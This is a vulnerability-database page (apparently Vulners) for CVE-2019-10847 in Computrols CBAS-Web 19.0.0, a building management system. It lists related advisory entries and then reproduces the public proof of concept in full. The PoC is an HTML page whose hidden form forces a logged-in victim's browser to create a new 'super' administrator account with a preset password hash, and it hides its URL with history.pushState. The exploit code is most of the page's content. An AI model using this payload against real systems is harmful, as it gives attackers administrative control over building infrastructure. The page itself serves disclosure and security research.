| Reporter | Title | Published | Views | Family All 13 |
|---|---|---|---|---|
| CBAS-Web 19.0.0 - Cross-Site Request Forgery (Add Super Admin) Vulnerability | 12 Nov 201900:00 | – | zdt | |
| CVE-2019-10847 | 24 May 201917:53 | – | circl | |
| Computrols CBAS Web Cross-Site Request Forgery Vulnerability (CNVD-2019-15903) | 24 May 201900:00 | – | cnvd | |
| CVE-2019-10847 | 24 May 201916:33 | – | cve | |
| CVE-2019-10847 | 24 May 201916:33 | – | cvelist | |
| CBAS-Web 19.0.0 - Cross-Site Request Forgery (Add Super Admin) | 12 Nov 201900:00 | – | exploitdb | |
| EUVD-2019-2574 | 7 Oct 202500:30 | – | euvd | |
| CBAS-Web 19.0.0 - Cross-Site Request Forgery (Add Super Admin) | 12 Nov 201900:00 | – | exploitpack | |
| Computrols CBAS Web | 21 May 201900:00 | – | ics | |
| CVE-2019-10847 | 24 May 201917:29 | – | nvd |
`
Computrols CBAS-Web 19.0.0 CSRF Add Super Admin
CVE: CVE-2019-10847
Advisory: https://applied-risk.com/resources/ar-2019-009
Paper: https://applied-risk.com/resources/i-own-your-building-management-system
Discovered by Gjoko 'LiquidWorm' Krstic
<!-- CSRF Add Super Admin -->
<html>
<body>
<script>history.pushState('', 't00t', 'index.php')</script>
<form action="http://192.168.1.250/cbas/index.php?m=users&a=user_add_p" method="POST">
<input type="hidden" name="username_" value="Sooper" />
<input type="hidden" name="first" value="Mess" />
<input type="hidden" name="last" value="O'Bradovich" />
<input type="hidden" name="email" value="[email protected]" />
<input type="hidden" name="password_" value="" />
<input type="hidden" name="notes" value="CSRFed" />
<input type="hidden" name="group_id" value="0" />
<input type="hidden" name="role" value="super" />
<input type="hidden" name="md5password" value="179edfe73d9c016b51e9dc77ae0eebb1" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation